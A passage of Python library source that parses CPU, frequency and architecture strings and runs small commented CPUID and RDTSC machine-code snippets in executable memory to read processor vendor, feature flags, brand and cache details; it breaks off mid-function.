retval = convert_to(retval)
except:
retval = default_value
# Return the default if there is no return value
if retval is None:
retval = default_value
return retval
def _to_decimal_string(ticks):
try:
# Convert to string
ticks = '{0}'.format(ticks)
# Sometimes ',' is used as a decimal separator
ticks = ticks.replace(',', '.')
# Strip off non numbers and decimal places
ticks = "".join(n for n in ticks if n.isdigit() or n=='.').strip()
if ticks == '':
ticks = '0'
# Add decimal if missing
if '.' not in ticks:
ticks = '{0}.0'.format(ticks)
# Remove trailing zeros
ticks = ticks.rstrip('0')
# Add one trailing zero for empty right side
if ticks.endswith('.'):
ticks = '{0}0'.format(ticks)
# Make sure the number can be converted to a float
ticks = float(ticks)
ticks = '{0}'.format(ticks)
return ticks
except:
return '0.0'
def _hz_short_to_full(ticks, scale):
try:
# Make sure the number can be converted to a float
ticks = float(ticks)
ticks = '{0}'.format(ticks)
# Scale the numbers
hz = ticks.lstrip('0')
old_index = hz.index('.')
hz = hz.replace('.', '')
hz = hz.ljust(scale + old_index+1, '0')
new_index = old_index + scale
hz = '{0}.{1}'.format(hz[:new_index], hz[new_index:])
left, right = hz.split('.')
left, right = int(left), int(right)
return (left, right)
except:
return (0, 0)
def _hz_friendly_to_full(hz_string):
try:
hz_string = hz_string.strip().lower()
hz, scale = (None, None)
if hz_string.endswith('ghz'):
scale = 9
elif hz_string.endswith('mhz'):
scale = 6
elif hz_string.endswith('hz'):
scale = 0
hz = "".join(n for n in hz_string if n.isdigit() or n=='.').strip()
if not '.' in hz:
hz += '.0'
hz, scale = _hz_short_to_full(hz, scale)
return (hz, scale)
except:
return (0, 0)
def _hz_short_to_friendly(ticks, scale):
try:
# Get the raw Hz as a string
left, right = _hz_short_to_full(ticks, scale)
result = '{0}.{1}'.format(left, right)
# Get the location of the dot, and remove said dot
dot_index = result.index('.')
result = result.replace('.', '')
# Get the Hz symbol and scale
symbol = "Hz"
scale = 0
if dot_index > 9:
symbol = "GHz"
scale = 9
elif dot_index > 6:
symbol = "MHz"
scale = 6
elif dot_index > 3:
symbol = "KHz"
scale = 3
# Get the Hz with the dot at the new scaled point
result = '{0}.{1}'.format(result[:-scale-1], result[-scale-1:])
# Format the ticks to have 4 numbers after the decimal
# and remove any superfluous zeroes.
result = '{0:.4f} {1}'.format(float(result), symbol)
result = result.rstrip('0')
return result
except:
return '0.0000 Hz'
def _to_friendly_bytes(input):
import re
if not input:
return input
input = "{0}".format(input)
formats = {
r"^[0-9]+B$" : 'B',
r"^[0-9]+K$" : 'KB',
r"^[0-9]+M$" : 'MB',
r"^[0-9]+G$" : 'GB'
}
for pattern, friendly_size in formats.items():
if re.match(pattern, input):
return "{0} {1}".format(input[ : -1].strip(), friendly_size)
return input
def _friendly_bytes_to_int(friendly_bytes):
input = friendly_bytes.lower()
formats = [
{'gib' : 1024 * 1024 * 1024},
{'mib' : 1024 * 1024},
{'kib' : 1024},
{'gb' : 1024 * 1024 * 1024},
{'mb' : 1024 * 1024},
{'kb' : 1024},
{'g' : 1024 * 1024 * 1024},
{'m' : 1024 * 1024},
{'k' : 1024},
{'b' : 1},
]
try:
for entry in formats:
pattern = list(entry.keys())[0]
multiplier = list(entry.values())[0]
if input.endswith(pattern):
return int(input.split(pattern)[0].strip()) * multiplier
except Exception as err:
pass
return friendly_bytes
def _parse_cpu_brand_string(cpu_string):
# Just return 0 if the processor brand does not have the Hz
if not 'hz' in cpu_string.lower():
return ('0.0', 0)
hz = cpu_string.lower()
scale = 0
if hz.endswith('mhz'):
scale = 6
elif hz.endswith('ghz'):
scale = 9
if '@' in hz:
hz = hz.split('@')[1]
else:
hz = hz.rsplit(None, 1)[1]
hz = hz.rstrip('mhz').rstrip('ghz').strip()
hz = _to_decimal_string(hz)
return (hz, scale)
def _parse_cpu_brand_string_dx(cpu_string):
import re
# Find all the strings inside brackets ()
starts = [m.start() for m in re.finditer(r"\(", cpu_string)]
ends = [m.start() for m in re.finditer(r"\)", cpu_string)]
insides = {k: v for k, v in zip(starts, ends)}
insides = [cpu_string[start+1 : end] for start, end in insides.items()]
# Find all the fields
vendor_id, stepping, model, family = (None, None, None, None)
for inside in insides:
for pair in inside.split(','):
pair = [n.strip() for n in pair.split(':')]
if len(pair) > 1:
name, value = pair[0], pair[1]
if name == 'origin':
vendor_id = value.strip('"')
elif name == 'stepping':
stepping = int(value.lstrip('0x'), 16)
elif name == 'model':
model = int(value.lstrip('0x'), 16)
elif name in ['fam', 'family']:
family = int(value.lstrip('0x'), 16)
# Find the Processor Brand
# Strip off extra strings in brackets at end
brand = cpu_string.strip()
is_working = True
while is_working:
is_working = False
for inside in insides:
full = "({0})".format(inside)
if brand.endswith(full):
brand = brand[ :-len(full)].strip()
is_working = True
# Find the Hz in the brand string
hz_brand, scale = _parse_cpu_brand_string(brand)
# Find Hz inside brackets () after the brand string
if hz_brand == '0.0':
for inside in insides:
hz = inside
for entry in ['GHz', 'MHz', 'Hz']:
if entry in hz:
hz = "CPU @ " + hz[ : hz.find(entry) + len(entry)]
hz_brand, scale = _parse_cpu_brand_string(hz)
break
return (hz_brand, scale, brand, vendor_id, stepping, model, family)
def _parse_dmesg_output(output):
try:
# Get all the dmesg lines that might contain a CPU string
lines = output.split(' CPU0:')[1:] + \
output.split(' CPU1:')[1:] + \
output.split(' CPU:')[1:] + \
output.split('\nCPU0:')[1:] + \
output.split('\nCPU1:')[1:] + \
output.split('\nCPU:')[1:]
lines = [l.split('\n')[0].strip() for l in lines]
# Convert the lines to CPU strings
cpu_strings = [_parse_cpu_brand_string_dx(l) for l in lines]
# Find the CPU string that has the most fields
best_string = None
highest_count = 0
for cpu_string in cpu_strings:
count = sum([n is not None for n in cpu_string])
if count > highest_count:
highest_count = count
best_string = cpu_string
# If no CPU string was found, return {}
if not best_string:
return {}
hz_actual, scale, processor_brand, vendor_id, stepping, model, family = best_string
# Origin
if ' Origin=' in output:
fields = output[output.find(' Origin=') : ].split('\n')[0]
fields = fields.strip().split()
fields = [n.strip().split('=') for n in fields]
fields = [{n[0].strip().lower() : n[1].strip()} for n in fields]
for field in fields:
name = list(field.keys())[0]
value = list(field.values())[0]
if name == 'origin':
vendor_id = value.strip('"')
elif name == 'stepping':
stepping = int(value.lstrip('0x'), 16)
elif name == 'model':
model = int(value.lstrip('0x'), 16)
elif name in ['fam', 'family']:
family = int(value.lstrip('0x'), 16)
# Features
flag_lines = []
for category in [' Features=', ' Features2=', ' AMD Features=', ' AMD Features2=']:
if category in output:
flag_lines.append(output.split(category)[1].split('\n')[0])
flags = []
for line in flag_lines:
line = line.split('<')[1].split('>')[0].lower()
for flag in line.split(','):
flags.append(flag)
flags.sort()
# Convert from GHz/MHz string to Hz
hz_advertised, scale = _parse_cpu_brand_string(processor_brand)
# If advertised hz not found, use the actual hz
if hz_advertised == '0.0':
scale = 6
hz_advertised = _to_decimal_string(hz_actual)
info = {
'vendor_id_raw' : vendor_id,
'brand_raw' : processor_brand,
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
if hz_advertised and hz_advertised != '0.0':
info['hz_advertised_friendly'] = _hz_short_to_friendly(hz_advertised, scale)
info['hz_actual_friendly'] = _hz_short_to_friendly(hz_actual, scale)
if hz_advertised and hz_advertised != '0.0':
info['hz_advertised'] = _hz_short_to_full(hz_advertised, scale)
info['hz_actual'] = _hz_short_to_full(hz_actual, scale)
return {k: v for k, v in info.items() if v}
except Exception as err:
g_trace.fail(err)
#raise
pass
return {}
def _parse_arch(arch_string_raw):
import re
arch, bits = None, None
arch_string_raw = arch_string_raw.lower()
# X86
if re.match(r'^i\d86$|^x86$|^x86_32$|^i86pc$|^ia32$|^ia-32$|^bepc$', arch_string_raw):
arch = 'X86_32'
bits = 32
elif re.match(r'^x64$|^x86_64$|^x86_64t$|^i686-64$|^amd64$|^ia64$|^ia-64$', arch_string_raw):
arch = 'X86_64'
bits = 64
# ARM
elif re.match(r'^armv8-a|aarch64|arm64$', arch_string_raw):
arch = 'ARM_8'
bits = 64
elif re.match(r'^armv7$|^armv7[a-z]$|^armv7-[a-z]$|^armv6[a-z]$', arch_string_raw):
arch = 'ARM_7'
bits = 32
elif re.match(r'^armv8$|^armv8[a-z]$|^armv8-[a-z]$', arch_string_raw):
arch = 'ARM_8'
bits = 32
# PPC
elif re.match(r'^ppc32$|^prep$|^pmac$|^powermac$', arch_string_raw):
arch = 'PPC_32'
bits = 32
elif re.match(r'^powerpc$|^ppc64$|^ppc64le$', arch_string_raw):
arch = 'PPC_64'
bits = 64
# SPARC
elif re.match(r'^sparc32$|^sparc$', arch_string_raw):
arch = 'SPARC_32'
bits = 32
elif re.match(r'^sparc64$|^sun4u$|^sun4v$', arch_string_raw):
arch = 'SPARC_64'
bits = 64
# S390X
elif re.match(r'^s390x$', arch_string_raw):
arch = 'S390X'
bits = 64
# MIPS
elif re.match('^mips$', arch_string_raw):
arch = 'MIPS_32'
bits = 32
elif re.match('^mips64$', arch_string_raw):
arch = 'MIPS_64'
bits = 64
# RISCV
elif re.match(r'^riscv$|^riscv32$|^riscv32be$', arch_string_raw):
arch = 'RISCV_32'
bits = 32
elif re.match(r'^riscv64$|^riscv64be$', arch_string_raw):
arch = 'RISCV_64'
bits = 64
# LOONG
elif re.match('^loongarch32$', arch_string_raw):
arch = 'LOONG_32'
bits = 32
elif re.match('^loongarch64$', arch_string_raw):
arch = 'LOONG_64'
bits = 64
return (arch, bits)
def _is_bit_set(reg, bit):
mask = 1 << bit
is_set = reg & mask > 0
return is_set
def _is_selinux_enforcing(trace):
# Just return if the SE Linux Status Tool is not installed
if not DataSource.has_sestatus():
trace.fail('Failed to find sestatus.')
return False
# Run the sestatus, and just return if it failed to run
returncode, output = DataSource.sestatus_b()
if returncode != 0:
trace.fail('Failed to run sestatus. Skipping ...')
return False
# Figure out if explicitly in enforcing mode
for line in output.splitlines():
line = line.strip().lower()
if line.startswith("current mode:"):
if line.endswith("enforcing"):
return True
else:
return False
# Figure out if we can execute heap and execute memory
can_selinux_exec_heap = False
can_selinux_exec_memory = False
for line in output.splitlines():
line = line.strip().lower()
if line.startswith("allow_execheap") and line.endswith("on"):
can_selinux_exec_heap = True
elif line.startswith("allow_execmem") and line.endswith("on"):
can_selinux_exec_memory = True
trace.command_output('can_selinux_exec_heap:', can_selinux_exec_heap)
trace.command_output('can_selinux_exec_memory:', can_selinux_exec_memory)
return (not can_selinux_exec_heap or not can_selinux_exec_memory)
def _filter_dict_keys_with_empty_values(info):
# Filter out None, 0, "", (), {}, []
info = {k: v for k, v in info.items() if v}
# Filter out (0, 0)
info = {k: v for k, v in info.items() if v != (0, 0)}
# Filter out strings that start with "0.0"
info = {k: v for k, v in info.items() if not (type(v) == str and v.startswith('0.0'))}
return info
class ASM(object):
def __init__(self, restype=None, argtypes=(), machine_code=[]):
self.restype = restype
self.argtypes = argtypes
self.machine_code = machine_code
self.prochandle = None
self.mm = None
self.func = None
self.address = None
self.size = 0
def compile(self):
machine_code = bytes.join(b'', self.machine_code)
self.size = ctypes.c_size_t(len(machine_code))
if DataSource.is_windows:
# Allocate a memory segment the size of the machine code, and make it executable
size = len(machine_code)
# Alloc at least 1 page to ensure we own all pages that we want to change protection on
if size < 0x1000: size = 0x1000
MEM_COMMIT = ctypes.c_ulong(0x1000)
PAGE_READWRITE = ctypes.c_ulong(0x4)
pfnVirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
pfnVirtualAlloc.restype = ctypes.c_void_p
self.address = pfnVirtualAlloc(None, ctypes.c_size_t(size), MEM_COMMIT, PAGE_READWRITE)
if not self.address:
raise Exception("Failed to VirtualAlloc")
# Copy the machine code into the memory segment
memmove = ctypes.CFUNCTYPE(ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_size_t)(ctypes._memmove_addr)
if memmove(self.address, machine_code, size) < 0:
raise Exception("Failed to memmove")
# Enable execute permissions
PAGE_EXECUTE = ctypes.c_ulong(0x10)
old_protect = ctypes.c_ulong(0)
pfnVirtualProtect = ctypes.windll.kernel32.VirtualProtect
res = pfnVirtualProtect(ctypes.c_void_p(self.address), ctypes.c_size_t(size), PAGE_EXECUTE, ctypes.byref(old_protect))
if not res:
raise Exception("Failed VirtualProtect")
# Flush Instruction Cache
# First, get process Handle
if not self.prochandle:
pfnGetCurrentProcess = ctypes.windll.kernel32.GetCurrentProcess
pfnGetCurrentProcess.restype = ctypes.c_void_p
self.prochandle = ctypes.c_void_p(pfnGetCurrentProcess())
# Actually flush cache
res = ctypes.windll.kernel32.FlushInstructionCache(self.prochandle, ctypes.c_void_p(self.address), ctypes.c_size_t(size))
if not res:
raise Exception("Failed FlushInstructionCache")
else:
from mmap import mmap, MAP_PRIVATE, MAP_ANONYMOUS, PROT_WRITE, PROT_READ, PROT_EXEC
# Allocate a private and executable memory segment the size of the machine code
machine_code = bytes.join(b'', self.machine_code)
self.size = len(machine_code)
self.mm = mmap(-1, self.size, flags=MAP_PRIVATE | MAP_ANONYMOUS, prot=PROT_WRITE | PROT_READ | PROT_EXEC)
# Copy the machine code into the memory segment
self.mm.write(machine_code)
self.address = ctypes.addressof(ctypes.c_int.from_buffer(self.mm))
# Cast the memory segment into a function
functype = ctypes.CFUNCTYPE(self.restype, *self.argtypes)
self.func = functype(self.address)
def run(self):
# Call the machine code like a function
retval = self.func()
return retval
def free(self):
# Free the function memory segment
if DataSource.is_windows:
MEM_RELEASE = ctypes.c_ulong(0x8000)
ctypes.windll.kernel32.VirtualFree(ctypes.c_void_p(self.address), ctypes.c_size_t(0), MEM_RELEASE)
else:
self.mm.close()
self.prochandle = None
self.mm = None
self.func = None
self.address = None
self.size = 0
class CPUID(object):
def __init__(self, trace=None):
if trace == None:
trace = Trace(False, False)
# Figure out if SE Linux is on and in enforcing mode
self.is_selinux_enforcing = _is_selinux_enforcing(trace)
def _asm_func(self, restype=None, argtypes=(), machine_code=[]):
asm = ASM(restype, argtypes, machine_code)
asm.compile()
return asm
def _run_asm(self, *machine_code):
asm = ASM(ctypes.c_uint32, (), machine_code)
asm.compile()
retval = asm.run()
asm.free()
return retval
# http://en.wikipedia.org/wiki/CPUID#EAX.3D0:_Get_vendor_ID
def get_vendor_id(self):
# EBX
ebx = self._run_asm(
b"\x31\xC0", # xor eax,eax
b"\x0F\xA2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
b"\x31\xC0", # xor eax,eax
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# EDX
edx = self._run_asm(
b"\x31\xC0", # xor eax,eax
b"\x0f\xa2" # cpuid
b"\x89\xD0" # mov ax,dx
b"\xC3" # ret
)
# Each 4bits is a ascii letter in the name
vendor_id = []
for reg in [ebx, edx, ecx]:
for n in [0, 8, 16, 24]:
vendor_id.append(chr((reg >> n) & 0xFF))
vendor_id = ''.join(vendor_id)
return vendor_id
# http://en.wikipedia.org/wiki/CPUID#EAX.3D1:_Processor_Info_and_Feature_Bits
def get_info(self):
# EAX
eax = self._run_asm(
b"\xB8\x01\x00\x00\x00", # mov eax,0x1"
b"\x0f\xa2" # cpuid
b"\xC3" # ret
)
# Get the CPU info
stepping_id = (eax >> 0) & 0xF # 4 bits
model = (eax >> 4) & 0xF # 4 bits
family_id = (eax >> 8) & 0xF # 4 bits
processor_type = (eax >> 12) & 0x3 # 2 bits
extended_model_id = (eax >> 16) & 0xF # 4 bits
extended_family_id = (eax >> 20) & 0xFF # 8 bits
family = 0
if family_id in [15]:
family = extended_family_id + family_id
else:
family = family_id
if family_id in [6, 15]:
model = (extended_model_id << 4) + model
return {
'stepping' : stepping_id,
'model' : model,
'family' : family,
'processor_type' : processor_type
}
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000000h:_Get_Highest_Extended_Function_Supported
def get_max_extension_support(self):
# Check for extension support
max_extension_support = self._run_asm(
b"\xB8\x00\x00\x00\x80" # mov ax,0x80000000
b"\x0f\xa2" # cpuid
b"\xC3" # ret
)
return max_extension_support
# http://en.wikipedia.org/wiki/CPUID#EAX.3D1:_Processor_Info_and_Feature_Bits
def get_flags(self, max_extension_support):
# EDX
edx = self._run_asm(
b"\xB8\x01\x00\x00\x00", # mov eax,0x1"
b"\x0f\xa2" # cpuid
b"\x89\xD0" # mov ax,dx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
b"\xB8\x01\x00\x00\x00", # mov eax,0x1"
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# Get the CPU flags
flags = {
'fpu' : _is_bit_set(edx, 0),
'vme' : _is_bit_set(edx, 1),
'de' : _is_bit_set(edx, 2),
'pse' : _is_bit_set(edx, 3),
'tsc' : _is_bit_set(edx, 4),
'msr' : _is_bit_set(edx, 5),
'pae' : _is_bit_set(edx, 6),
'mce' : _is_bit_set(edx, 7),
'cx8' : _is_bit_set(edx, 8),
'apic' : _is_bit_set(edx, 9),
#'reserved1' : _is_bit_set(edx, 10),
'sep' : _is_bit_set(edx, 11),
'mtrr' : _is_bit_set(edx, 12),
'pge' : _is_bit_set(edx, 13),
'mca' : _is_bit_set(edx, 14),
'cmov' : _is_bit_set(edx, 15),
'pat' : _is_bit_set(edx, 16),
'pse36' : _is_bit_set(edx, 17),
'pn' : _is_bit_set(edx, 18),
'clflush' : _is_bit_set(edx, 19),
#'reserved2' : _is_bit_set(edx, 20),
'dts' : _is_bit_set(edx, 21),
'acpi' : _is_bit_set(edx, 22),
'mmx' : _is_bit_set(edx, 23),
'fxsr' : _is_bit_set(edx, 24),
'sse' : _is_bit_set(edx, 25),
'sse2' : _is_bit_set(edx, 26),
'ss' : _is_bit_set(edx, 27),
'ht' : _is_bit_set(edx, 28),
'tm' : _is_bit_set(edx, 29),
'ia64' : _is_bit_set(edx, 30),
'pbe' : _is_bit_set(edx, 31),
'pni' : _is_bit_set(ecx, 0),
'pclmulqdq' : _is_bit_set(ecx, 1),
'dtes64' : _is_bit_set(ecx, 2),
'monitor' : _is_bit_set(ecx, 3),
'ds_cpl' : _is_bit_set(ecx, 4),
'vmx' : _is_bit_set(ecx, 5),
'smx' : _is_bit_set(ecx, 6),
'est' : _is_bit_set(ecx, 7),
'tm2' : _is_bit_set(ecx, 8),
'ssse3' : _is_bit_set(ecx, 9),
'cid' : _is_bit_set(ecx, 10),
#'reserved3' : _is_bit_set(ecx, 11),
'fma' : _is_bit_set(ecx, 12),
'cx16' : _is_bit_set(ecx, 13),
'xtpr' : _is_bit_set(ecx, 14),
'pdcm' : _is_bit_set(ecx, 15),
#'reserved4' : _is_bit_set(ecx, 16),
'pcid' : _is_bit_set(ecx, 17),
'dca' : _is_bit_set(ecx, 18),
'sse4_1' : _is_bit_set(ecx, 19),
'sse4_2' : _is_bit_set(ecx, 20),
'x2apic' : _is_bit_set(ecx, 21),
'movbe' : _is_bit_set(ecx, 22),
'popcnt' : _is_bit_set(ecx, 23),
'tscdeadline' : _is_bit_set(ecx, 24),
'aes' : _is_bit_set(ecx, 25),
'xsave' : _is_bit_set(ecx, 26),
'osxsave' : _is_bit_set(ecx, 27),
'avx' : _is_bit_set(ecx, 28),
'f16c' : _is_bit_set(ecx, 29),
'rdrnd' : _is_bit_set(ecx, 30),
'hypervisor' : _is_bit_set(ecx, 31)
}
# Get a list of only the flags that are true
flags = [k for k, v in flags.items() if v]
# http://en.wikipedia.org/wiki/CPUID#EAX.3D7.2C_ECX.3D0:_Extended_Features
if max_extension_support >= 7:
# EBX
ebx = self._run_asm(
b"\x31\xC9", # xor ecx,ecx
b"\xB8\x07\x00\x00\x00" # mov eax,7
b"\x0f\xa2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
b"\x31\xC9", # xor ecx,ecx
b"\xB8\x07\x00\x00\x00" # mov eax,7
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# Get the extended CPU flags
extended_flags = {
#'fsgsbase' : _is_bit_set(ebx, 0),
#'IA32_TSC_ADJUST' : _is_bit_set(ebx, 1),
'sgx' : _is_bit_set(ebx, 2),
'bmi1' : _is_bit_set(ebx, 3),
'hle' : _is_bit_set(ebx, 4),
'avx2' : _is_bit_set(ebx, 5),
#'reserved' : _is_bit_set(ebx, 6),
'smep' : _is_bit_set(ebx, 7),
'bmi2' : _is_bit_set(ebx, 8),
'erms' : _is_bit_set(ebx, 9),
'invpcid' : _is_bit_set(ebx, 10),
'rtm' : _is_bit_set(ebx, 11),
'pqm' : _is_bit_set(ebx, 12),
#'FPU CS and FPU DS deprecated' : _is_bit_set(ebx, 13),
'mpx' : _is_bit_set(ebx, 14),
'pqe' : _is_bit_set(ebx, 15),
'avx512f' : _is_bit_set(ebx, 16),
'avx512dq' : _is_bit_set(ebx, 17),
'rdseed' : _is_bit_set(ebx, 18),
'adx' : _is_bit_set(ebx, 19),
'smap' : _is_bit_set(ebx, 20),
'avx512ifma' : _is_bit_set(ebx, 21),
'pcommit' : _is_bit_set(ebx, 22),
'clflushopt' : _is_bit_set(ebx, 23),
'clwb' : _is_bit_set(ebx, 24),
'intel_pt' : _is_bit_set(ebx, 25),
'avx512pf' : _is_bit_set(ebx, 26),
'avx512er' : _is_bit_set(ebx, 27),
'avx512cd' : _is_bit_set(ebx, 28),
'sha' : _is_bit_set(ebx, 29),
'avx512bw' : _is_bit_set(ebx, 30),
'avx512vl' : _is_bit_set(ebx, 31),
'prefetchwt1' : _is_bit_set(ecx, 0),
'avx512vbmi' : _is_bit_set(ecx, 1),
'umip' : _is_bit_set(ecx, 2),
'pku' : _is_bit_set(ecx, 3),
'ospke' : _is_bit_set(ecx, 4),
#'reserved' : _is_bit_set(ecx, 5),
'avx512vbmi2' : _is_bit_set(ecx, 6),
#'reserved' : _is_bit_set(ecx, 7),
'gfni' : _is_bit_set(ecx, 8),
'vaes' : _is_bit_set(ecx, 9),
'vpclmulqdq' : _is_bit_set(ecx, 10),
'avx512vnni' : _is_bit_set(ecx, 11),
'avx512bitalg' : _is_bit_set(ecx, 12),
#'reserved' : _is_bit_set(ecx, 13),
'avx512vpopcntdq' : _is_bit_set(ecx, 14),
#'reserved' : _is_bit_set(ecx, 15),
#'reserved' : _is_bit_set(ecx, 16),
#'mpx0' : _is_bit_set(ecx, 17),
#'mpx1' : _is_bit_set(ecx, 18),
#'mpx2' : _is_bit_set(ecx, 19),
#'mpx3' : _is_bit_set(ecx, 20),
#'mpx4' : _is_bit_set(ecx, 21),
'rdpid' : _is_bit_set(ecx, 22),
#'reserved' : _is_bit_set(ecx, 23),
#'reserved' : _is_bit_set(ecx, 24),
#'reserved' : _is_bit_set(ecx, 25),
#'reserved' : _is_bit_set(ecx, 26),
#'reserved' : _is_bit_set(ecx, 27),
#'reserved' : _is_bit_set(ecx, 28),
#'reserved' : _is_bit_set(ecx, 29),
'sgx_lc' : _is_bit_set(ecx, 30),
#'reserved' : _is_bit_set(ecx, 31)
}
# Get a list of only the flags that are true
extended_flags = [k for k, v in extended_flags.items() if v]
flags += extended_flags
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000001h:_Extended_Processor_Info_and_Feature_Bits
if max_extension_support >= 0x80000001:
# EBX
ebx = self._run_asm(
b"\xB8\x01\x00\x00\x80" # mov ax,0x80000001
b"\x0f\xa2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
b"\xB8\x01\x00\x00\x80" # mov ax,0x80000001
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# Get the extended CPU flags
extended_flags = {
'fpu' : _is_bit_set(ebx, 0),
'vme' : _is_bit_set(ebx, 1),
'de' : _is_bit_set(ebx, 2),
'pse' : _is_bit_set(ebx, 3),
'tsc' : _is_bit_set(ebx, 4),
'msr' : _is_bit_set(ebx, 5),
'pae' : _is_bit_set(ebx, 6),
'mce' : _is_bit_set(ebx, 7),
'cx8' : _is_bit_set(ebx, 8),
'apic' : _is_bit_set(ebx, 9),
#'reserved' : _is_bit_set(ebx, 10),
'syscall' : _is_bit_set(ebx, 11),
'mtrr' : _is_bit_set(ebx, 12),
'pge' : _is_bit_set(ebx, 13),
'mca' : _is_bit_set(ebx, 14),
'cmov' : _is_bit_set(ebx, 15),
'pat' : _is_bit_set(ebx, 16),
'pse36' : _is_bit_set(ebx, 17),
#'reserved' : _is_bit_set(ebx, 18),
'mp' : _is_bit_set(ebx, 19),
'nx' : _is_bit_set(ebx, 20),
#'reserved' : _is_bit_set(ebx, 21),
'mmxext' : _is_bit_set(ebx, 22),
'mmx' : _is_bit_set(ebx, 23),
'fxsr' : _is_bit_set(ebx, 24),
'fxsr_opt' : _is_bit_set(ebx, 25),
'pdpe1gp' : _is_bit_set(ebx, 26),
'rdtscp' : _is_bit_set(ebx, 27),
#'reserved' : _is_bit_set(ebx, 28),
'lm' : _is_bit_set(ebx, 29),
'3dnowext' : _is_bit_set(ebx, 30),
'3dnow' : _is_bit_set(ebx, 31),
'lahf_lm' : _is_bit_set(ecx, 0),
'cmp_legacy' : _is_bit_set(ecx, 1),
'svm' : _is_bit_set(ecx, 2),
'extapic' : _is_bit_set(ecx, 3),
'cr8_legacy' : _is_bit_set(ecx, 4),
'abm' : _is_bit_set(ecx, 5),
'sse4a' : _is_bit_set(ecx, 6),
'misalignsse' : _is_bit_set(ecx, 7),
'3dnowprefetch' : _is_bit_set(ecx, 8),
'osvw' : _is_bit_set(ecx, 9),
'ibs' : _is_bit_set(ecx, 10),
'xop' : _is_bit_set(ecx, 11),
'skinit' : _is_bit_set(ecx, 12),
'wdt' : _is_bit_set(ecx, 13),
#'reserved' : _is_bit_set(ecx, 14),
'lwp' : _is_bit_set(ecx, 15),
'fma4' : _is_bit_set(ecx, 16),
'tce' : _is_bit_set(ecx, 17),
#'reserved' : _is_bit_set(ecx, 18),
'nodeid_msr' : _is_bit_set(ecx, 19),
#'reserved' : _is_bit_set(ecx, 20),
'tbm' : _is_bit_set(ecx, 21),
'topoext' : _is_bit_set(ecx, 22),
'perfctr_core' : _is_bit_set(ecx, 23),
'perfctr_nb' : _is_bit_set(ecx, 24),
#'reserved' : _is_bit_set(ecx, 25),
'dbx' : _is_bit_set(ecx, 26),
'perftsc' : _is_bit_set(ecx, 27),
'pci_l2i' : _is_bit_set(ecx, 28),
#'reserved' : _is_bit_set(ecx, 29),
#'reserved' : _is_bit_set(ecx, 30),
#'reserved' : _is_bit_set(ecx, 31)
}
# Get a list of only the flags that are true
extended_flags = [k for k, v in extended_flags.items() if v]
flags += extended_flags
flags.sort()
return flags
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000002h.2C80000003h.2C80000004h:_Processor_Brand_String
def get_processor_brand(self, max_extension_support):
processor_brand = ""
# Processor brand string
if max_extension_support >= 0x80000004:
instructions = [
b"\xB8\x02\x00\x00\x80", # mov ax,0x80000002
b"\xB8\x03\x00\x00\x80", # mov ax,0x80000003
b"\xB8\x04\x00\x00\x80" # mov ax,0x80000004
]
for instruction in instructions:
# EAX
eax = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xC0" # mov ax,ax
b"\xC3" # ret
)
# EBX
ebx = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# EDX
edx = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xD0" # mov ax,dx
b"\xC3" # ret
)
# Combine each of the 4 bytes in each register into the string
for reg in [eax, ebx, ecx, edx]:
for n in [0, 8, 16, 24]:
processor_brand += chr((reg >> n) & 0xFF)
# Strip off any trailing NULL terminators and white space
processor_brand = processor_brand.strip("\0").strip()
return processor_brand
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000006h:_Extended_L2_Cache_Features
def get_cache(self, max_extension_support):
cache_info = {}
# Just return if the cache feature is not supported
if max_extension_support < 0x80000006:
return cache_info
# ECX
ecx = self._run_asm(
b"\xB8\x06\x00\x00\x80" # mov ax,0x80000006
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
cache_info = {
'size_b' : (ecx & 0xFF) * 1024,
'associativity' : (ecx >> 12) & 0xF,
'line_size_b' : (ecx >> 16) & 0xFFFF
}
return cache_info
def get_ticks_func(self):
retval = None
if DataSource.bits == '32bit':
# Works on x86_32
restype = None
argtypes = (ctypes.POINTER(ctypes.c_uint), ctypes.POINTER(ctypes.c_uint))
get_ticks_x86_32 = self._asm_func(restype, argtypes,
[
b"\x55", # push bp
b"\x89\xE5", # mov bp,sp
b"\x31\xC0", # xor ax,ax
b"\x0F\xA2", # cpuid
b"\x0F\x31", # rdtsc
b"\x8B\x5D\x08", # mov bx,[di+0x8]
b"\x8B\x4D\x0C", # mov cx,[di+0xc]
b"\x89\x13", # mov [bp+di],dx
b"\x89\x01", # mov [bx+di],ax
b"\x5D", # pop bp
b"\xC3" # ret
]
)
# Monkey patch func to combine high and low args into one return
old_func = get_ticks_x86_32.func
def new_func():
# Pass two uint32s into function
high = ctypes.c_uint32(0)
low = ctypes.c_uint32(0)
old_func(ctypes.byref(high), ctypes.byref(low))
# Shift the two uint32s into one uint64
retval = ((high.value << 32) & 0xFFFFFFFF00000000) | low.value
return retval
get_ticks_x86_32.func = new_func
retval = get_ticks_x86_32
elif DataSource.bits == '64bit':
# Works on x86_64
restype = ctypes.c_uint64
argtypes = ()
get_ticks_x86_64 = self._asm_func(restype, argtypes,
[
